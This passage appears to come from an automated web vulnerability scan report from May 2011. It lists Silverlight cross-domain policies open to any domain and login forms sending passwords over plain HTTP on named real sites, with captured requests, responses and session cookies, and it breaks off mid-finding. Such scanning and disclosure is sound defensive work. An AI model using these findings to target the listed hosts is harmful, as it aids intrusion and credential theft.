Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: omni.accenture.com

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 13:59:41 GMT
Server: Omniture DC/2.0.0
xserver: www44
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

8.5. http://pixel.33across.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.33across.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: pixel.33across.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
ETag: W/"335-1298012417000"
Last-Modified: Fri, 18 Feb 2011 07:00:17 GMT
Content-Type: application/xml
Content-Length: 335
Date: Sat, 14 May 2011 18:35:10 GMT
Connection: close
Server: 33XG1

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="SOAPAction">
<domain uri="*"/>
</allow-from>
<gr
...[SNIP]...

8.6. http://secure-us.imrworldwide.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 22:34:15 GMT
Server: Apache
Cache-Control: max-age=604800
Expires: Sat, 21 May 2011 22:34:15 GMT
Last-Modified: Mon, 19 Oct 2009 01:46:36 GMT
ETag: "ff-4adbc4fc"
Accept-Ranges: bytes
Content-Length: 255
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resource path="/" include-subpaths="true" />
</grant
...[SNIP]...

8.7. http://stats.wordpress.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://stats.wordpress.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: stats.wordpress.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 14 May 2011 18:06:14 GMT
Content-Type: text/xml
Connection: close
Content-Length: 309
Last-Modified: Tue, 22 Mar 2011 14:38:27 GMT
Accept-Ranges: bytes

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
</allow-from>
<grant-to>

...[SNIP]...

8.8. http://yatra.122.2o7.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yatra.122.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: yatra.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 18:35:51 GMT
Server: Omniture DC/2.0.0
xserver: www392
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

9. Cleartext submission of password  previous  next
There are 15 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


9.1. http://appworld.blackberry.com/webstore/content/19736  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://appworld.blackberry.com
Path:   /webstore/content/19736

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /webstore/content/19736 HTTP/1.1
Host: appworld.blackberry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: RIM
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=86400
Date: Sat, 14 May 2011 14:12:46 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 202838

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <script src="/webstore/a
...[SNIP]...
<div>
<form id="deviceModalsForm4" name="deviceModalsForm4" method="post" action="/webstore/content/home.seam" class="awModalMessageForm" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="deviceModalsForm4" value="deviceModalsForm4" />
...[SNIP]...
<td><input id="deviceModalsForm4:inputPassword2" type="password" name="deviceModalsForm4:inputPassword2" value="" maxlength="32" onkeypress="userPin = $F('pin_list'); return enterKeyTrap(event, 'doDeviceChange(\'deviceChangeWindow\',\'' + userPin +'\',\'' + $F('deviceModalsForm4:inputPassword2') +'\')');" disabled="disabled" class="awChangeDevicePasswordField" /></td>
...[SNIP]...

9.2. http://appworld.blackberry.com/webstore/content/19736  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://appworld.blackberry.com
Path:   /webstore/content/19736

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /webstore/content/19736 HTTP/1.1
Host: appworld.blackberry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: RIM
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=86400
Date: Sat, 14 May 2011 14:12:46 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 202838

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <script src="/webstore/a
...[SNIP]...
<div>
<form id="deviceModalsForm1" name="deviceModalsForm1" method="post" action="/webstore/content/home.seam" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="deviceModalsForm1" value="deviceModalsForm1" />
...[SNIP]...
<td><input id="deviceModalsForm1:inputPassword" type="password" name="deviceModalsForm1:inputPassword" value="" maxlength="32" onkeypress="return enterKeyTrap(event, 'doDeviceConnect(\'deviceAuthenticationWindow\',\'' + $F('deviceModalsForm1:inputPassword') + '\')');" /></td>
...[SNIP]...

9.3. http://appworld.blackberry.com/webstore/content/19736  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://appworld.blackberry.com
Path:   /webstore/content/19736

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /webstore/content/19736 HTTP/1.1
Host: appworld.blackberry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: RIM
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=86400
Date: Sat, 14 May 2011 14:12:46 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 202838

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <script src="/webstore/a
...[SNIP]...
<div>
<form id="deviceModalsForm2" name="deviceModalsForm2" method="post" action="/webstore/content/home.seam" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="deviceModalsForm2" value="deviceModalsForm2" />
...[SNIP]...
<td><input id="deviceModalsForm2:inputPassword3" type="password" name="deviceModalsForm2:inputPassword3" value="" maxlength="32" onkeypress="return enterKeyTrap(event, 'doDeviceConnect(\'deviceInvalidPasswordWindow\',\'' + $F('deviceModalsForm2:inputPassword3') + '\')');" /></td>
...[SNIP]...

9.4. http://documents.policybazaar.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://documents.policybazaar.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: documents.policybazaar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 13:52:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3186


<link href="Application_Masters/IN/EN-US/Scripts/styles.css" rel="stylesheet" />
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitio
...[SNIP]...
<body>
<form name="form1" method="post" action="Login1.aspx" id="form1">
<div>
...[SNIP]...
<div align="center">
&nbsp;<input name="txtPassword" type="password" id="txtPassword" style="width:230px;" /></div>
...[SNIP]...

9.5. http://documents.policybazaar.com/Login1.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://documents.policybazaar.com
Path:   /Login1.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /Login1.aspx HTTP/1.1
Host: documents.policybazaar.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 14 May 2011 14:14:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3186


<link href="Application_Masters/IN/EN-US/Scripts/styles.css" rel="stylesheet" />
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitio
...[SNIP]...
<body>
<form name="form1" method="post" action="Login1.aspx" id="form1">
<div>
...[SNIP]...
<div align="center">
&nbsp;<input name="txtPassword" type="password" id="txtPassword" style="width:230px;" /></div>
...[SNIP]...

9.6. http://login.naukri.com/nLogin/Login.php  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://login.naukri.com
Path:   /nLogin/Login.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /nLogin/Login.php HTTP/1.1
Host: login.naukri.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: naukri.comnginx/0.7.62
Content-Type: text/html
X-Powered-By: PHP/5.2.5
Date: Sat, 14 May 2011 14:13:02 GMT
Content-Length: 25679
Connection: close
Set-Cookie: test=naukri.com; expires=Fri, 09-May-2031 14:12:52 GMT; path=/; domain=.naukri.com; httponly
Set-Cookie: MYNAUKRI[ID]=deleted; expires=Fri, 14-May-2010 14:12:51 GMT; path=/; domain=.naukri.com; httponly
Set-Cookie: MYNAUKRI[TOUT]=deleted; expires=Fri, 14-May-2010 14:12:51 GMT; path=/; domain=.naukri.com; httponly
Set-Cookie: MYNAUKRI[RESID]=deleted; expires=Fri, 14-May-2010 14:12:51 GMT; path=/; domain=.naukri.com; httponly
Set-Cookie: MYNAUKRI[NI_FN_HS]=deleted; expires=Fri, 14-May-2010 14:12:51 GMT; path=/; domain=.naukri.com; httponly
Set-Cookie: MYNAUKRI[RS]=deleted; expires=Fri, 14-May-2010 14:12:51 GMT; path=/; domain=.naukri.com; httponly
Set-Cookie: MYNAUKBMS[GENDER]=deleted; expires=Fri, 14-May-2010 14:12:51 GMT; path=/; domain=.naukri.com; httponly
Set-Cookie: MYNAUKBMS[DTOFBIRTH]=deleted; expires=Fri, 14-May-2010 14:12:51 GMT; path=/; domain=.naukri.com; httponly
Set-Cookie: MYNAUKBMS[TOTALEXP]=deleted; expires=Fri, 14-May-2010 14:12:51 GMT; path=/; domain=.naukri.com; httponly
Set-Cookie: MYNAUKBMS[FAREA]=deleted; expires=Fri, 14-May-2010 14:12:51 GMT; path=/; domain=.naukri.com; httponly
Set-Cookie: MYNAUKBMS[INDTYPE]=deleted; expires=Fri, 14-May-2010 14:12:51 GMT; path=/; domain=.naukri.com; httponly
Set-Cookie: MYNAUKBMS[CTC_LACS]=deleted; expires=Fri, 14-May-2010 14:12:51 GMT; path=/; domain=.naukri.com; httponly
Set-Cookie: MYNAUKBMS[CTC_THOUSAND]=deleted; expires=Fri, 14-May-2010 14:12:51 GMT; path=/; domain=.naukri.com; httponly
Set-Cookie: MYNAUKBMS[IMAGEMAP]=deleted; expires=Fri, 14-May-2010 14:12:51 GMT; path=/; domain=.naukri.com; httponly
Set-Cookie: MYNAUKBMS[MISC]=deleted; expires=Fri, 14-May-2010 14:12:51 GMT; path=/; domain=.naukri.com; httponly

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Naukri.com Login: Search the best jobs available in In
...[SNIP]...
<!-- un -->
<form method="post" action="" onsubmit="return validateForm()" name="login" style="margin:0;padding:0;">
<input type="hidden" name="formSubmitted" value="0">
...[SNIP]...
</div>
<input name="PASSWORD" type="password" maxlength="40" id="password" style="width:210px; padding:2px;margin-top:5px;" />


<div style="padding-top:10px;" class="cls">
...[SNIP]...

9.7. http://us.blackberry.com/apps-software/appworld/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://us.blackberry.com
Path:   /apps-software/appworld/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /apps-software/appworld/ HTTP/1.1
Host: us.blackberry.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Pragma: no-cache
Content-Length: 36629
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 14 May 2011 14:23:30 GMT
Date: Sat, 14 May 2011 14:23:30 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<!
...[SNIP]...
</div>
           <form action="http://my.blackberry.com/cs_login" method="post" class="searchForm">
               <label for="loginNavUsername">
...[SNIP]...
<input type="text" value="Password" rimprompt="Password" id="loginNavFakePassword" name="fakepassword" /><input type="password" id="loginNavPassword" name="password" />
               <button type="submit" id="loginNavSubmit">
...[SNIP]...

9.8. http://www.99labels.com/v1/DeliveryPolicy.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.99labels.com
Path:   /v1/DeliveryPolicy.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /v1/DeliveryPolicy.aspx HTTP/1.1
Host: www.99labels.com
Proxy-Connection: keep-alive
Referer: http://www.99labels.com/v1/index.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPX99ANONYMOUS=4ZXTm6wxRhDD4Oy9AjUJHOiAGBtNAUNw9Bp4knlj0psQzkkG18UPBf6hDCBJ4NYgDOzd6ZiJ6KMpMk3-wKPjc7G7Fg_gOniwp0C5QXTBtrssba5rAUvn6wad1ZlsYE0qIYhDVgK9dVpRbmHT7yYp-dwDLTIR46wybHqbi9EjCpSTpcjv0; ASP.NET_SessionId=sw5rqr454tm12q55eju1glz4; X-Mapping-nphficco=A600CB3C75C545347E22006DE45F782A; __utmz=24553842.1305398223.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24553842.2079333484.1305398223.1305398223.1305398223.1; __utmc=24553842; __utmb=24553842.1.10.1305398223; fbsetting_184918808211406=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 14 May 2011 18:37:34 GMT
Content-Length: 67094


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
<body>
<form name="aspnetForm" method="post" action="DeliveryPolicy.aspx" id="aspnetForm">
<div>
...[SNIP]...
<div class="loginfrminput">
<input name="ctl00$header1$TxtPwd" type="password" id="ctl00_header1_TxtPwd" tabindex="2" class="field" />
</div>
...[SNIP]...

9.9. http://www.99labels.com/v1/brand-items.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.99labels.com
Path:   /v1/brand-items.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /v1/brand-items.aspx?SalesId=OTAx&CategoryID=NzY5&subCategoryID=Nzg5 HTTP/1.1
Host: www.99labels.com
Proxy-Connection: keep-alive
Referer: http://www.99labels.com/v1/DeliveryPolicy.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPX99ANONYMOUS=4ZXTm6wxRhDD4Oy9AjUJHOiAGBtNAUNw9Bp4knlj0psQzkkG18UPBf6hDCBJ4NYgDOzd6ZiJ6KMpMk3-wKPjc7G7Fg_gOniwp0C5QXTBtrssba5rAUvn6wad1ZlsYE0qIYhDVgK9dVpRbmHT7yYp-dwDLTIR46wybHqbi9EjCpSTpcjv0; ASP.NET_SessionId=sw5rqr454tm12q55eju1glz4; X-Mapping-nphficco=A600CB3C75C545347E22006DE45F782A; __utmz=24553842.1305398223.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fbsetting_184918808211406=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; expandable=-1c; __utma=24553842.2079333484.1305398223.1305398223.1305398223.1; __utmc=24553842; __utmb=24553842.2.10.1305398223

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=iso-8859-1
Location: http://www.99labels.com/v1/brand-items.aspx?SalesId=OTAx&CategoryID=NzY5&subCategoryID=Nzg5
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 14 May 2011 18:37:50 GMT
Content-Length: 123747


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
<body>
<form name="aspnetForm" method="post" action="brand.aspx?SaleID=OTAx" id="aspnetForm">
<div>
...[SNIP]...
<div class="loginfrminput">
<input name="ctl00$header1$TxtPwd" type="password" id="ctl00_header1_TxtPwd" tabindex="2" class="field" />
</div>
...[SNIP]...

9.10. http://www.99labels.com/v1/index.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.99labels.com
Path:   /v1/index.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /v1/index.aspx HTTP/1.1
Host: www.99labels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 14 May 2011 18:36:56 GMT
Content-Length: 22629


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<body>
<form name="form1" method="post" action="index.aspx" onsubmit="javascript:return WebForm_OnSubmit();" id="form1">
<div>
...[SNIP]...
<div class="frminput">
<input name="myLogin$Password" type="password" id="myLogin_Password" tabindex="2" title="Password" class="field" />
<span id="myLogin_PasswordRequired" title="Password is required." style="color:Red;display:none;">
...[SNIP]...

9.11. http://www.99labels.com/v1/loginpopup.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.99labels.com
Path:   /v1/loginpopup.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /v1/loginpopup.aspx?pageurl=http%3A%2F%2Fwww.99labels.com%2Fv1%2Fbrand-items.aspx%3FSalesId%3DOTAx%26CategoryID%3DNzY5%26subCategoryID%3DNzg5 HTTP/1.1
Host: www.99labels.com
Proxy-Connection: keep-alive
Referer: http://www.99labels.com/v1/brand-items.aspx?SalesId=OTAx&CategoryID=NzY5&subCategoryID=Nzg5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fcspersistslider=1; .ASPX99ANONYMOUS=4ZXTm6wxRhDD4Oy9AjUJHOiAGBtNAUNw9Bp4knlj0psQzkkG18UPBf6hDCBJ4NYgDOzd6ZiJ6KMpMk3-wKPjc7G7Fg_gOniwp0C5QXTBtrssba5rAUvn6wad1ZlsYE0qIYhDVgK9dVpRbmHT7yYp-dwDLTIR46wybHqbi9EjCpSTpcjv0; ASP.NET_SessionId=sw5rqr454tm12q55eju1glz4; X-Mapping-nphficco=A600CB3C75C545347E22006DE45F782A; __utmz=24553842.1305398223.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fbsetting_184918808211406=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; expandable=-1c; __utma=24553842.2079333484.1305398223.1305398223.1305398223.1; __utmc=24553842; __utmb=24553842.3.10.1305398223

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 14 May 2011 18:38:08 GMT
Content-Length: 10015


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Login
</tit
...[SNIP]...
<body>
<form name="signin" method="post" action="loginpopup.aspx?pageurl=http%3a%2f%2fwww.99labels.com%2fv1%2fbrand-items.aspx%3fSalesId%3dOTAx%26CategoryID%3dNzY5%26subCategoryID%3dNzg5" id="signin">
<div>
...[SNIP]...
<div class="frminput">
<input name="TxtPwd" type="password" id="TxtPwd" tabindex="2" class="field" />
</div>
...[SNIP]...

9.12. http://www.naukri.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.naukri.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.naukri.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: NWS/1.0
X-Powered-By: PHP/5.2.3
Cache-Control: no-transform
Vary: User-Agent,Accept,Accept-Encoding
Content-Type: text/html
Date: Sat, 14 May 2011 13:58:14 GMT
Content-Length: 105852
Connection: close
Set-Cookie: test=naukri.com; path=/; domain=.naukri.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
</script>
<form method="post" action="http://login.naukri.com/nLogin/Login.php" target="_self" class="m0p0">
<div class="informTP">
...[SNIP]...
<td class="w140 valt"><input id="password" name="PASSWORD" type="password" value=""/></td>
...[SNIP]...

9.13. http://www.quora.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.quora.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.quora.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: m-b=KnQltoIvGU-zgVNet6ZeBQ==; m-tz=300; __utmz=261736717.1305305580.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=261736717.2135279484.1305305580.1305305580.1305305580.1; m-s=elrhGUM55MQtNfHFxEBqeA==

Response

HTTP/1.1 200 OK
Server: PasteWSGIServer/0.5 Python/2.6.2
Date: Sun, 15 May 2011 11:19:11 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: private, no-store, max-age=0, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Length: 17438

